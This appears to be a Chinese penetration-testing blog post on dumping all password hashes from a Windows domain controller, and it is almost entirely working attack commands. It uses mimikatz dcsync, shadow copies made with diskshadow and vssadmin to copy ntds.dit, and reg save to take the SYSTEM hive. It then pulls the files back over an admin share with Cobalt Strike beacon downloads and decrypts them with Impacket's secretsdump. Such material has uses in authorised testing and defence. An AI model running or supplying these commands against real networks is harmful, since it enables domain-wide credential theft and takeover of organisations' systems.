一、dcsync导入域内所有hash

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"

【域渗透】Windows域控导出Hash

二、利用diskshadow 之前需要先切换到 system32 目录下

diskshadow.exe
set context persistent nowriters
add volume c: alias stack
create
expose %stack% z: DISKSHADOW> exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
delete shadows all
list shadows all
reset DISKSHADOW> exit
reg save hklm\system c:\windows\temp\system.hive

beacon> download ntds.dit

beacon> download system.hive

 【域渗透】Windows域控导出Hash

将两个文件从域控托回被控机

net use \\192.168.75.129\c$ /user:"yiwang\Adminis

move \\192.168.75.129\admin$\temp\ntds.dit c:\windows\temp\

move \\192.168.75.129\admin$\temp\system.hive c:\windows\temp\

net use * /del /yes 

mpacket中用 secretsdump.py脚本进行解密

python secretsdump.py -system system.hive -ntds ntds.dit LOCAL >>hash.txt

【域渗透】Windows域控导出Hash

 

四、vssadmin离线导入hash

vssadmin list shadows
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy65\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit
vssadmin delete shadows /for=c: /quiet
esentutl /p /o c:\windows\temp\ntds.dit
reg save hklm\system c:\windows\temp\system.hive

【域渗透】Windows域控导出Hash

 

参考:

https://xz.aliyun.com/t/2527#toc-1 

相关文章:

  • 2022-12-23
  • 2021-11-04
  • 2021-11-18
  • 2021-08-12
  • 2021-06-14
  • 2022-12-23
  • 2021-09-17
  • 2021-06-22
猜你喜欢
  • 2021-11-13
  • 2021-10-07
  • 2022-02-20
  • 2021-06-01
  • 2021-11-18
  • 2021-11-04
相关资源
相似解决方案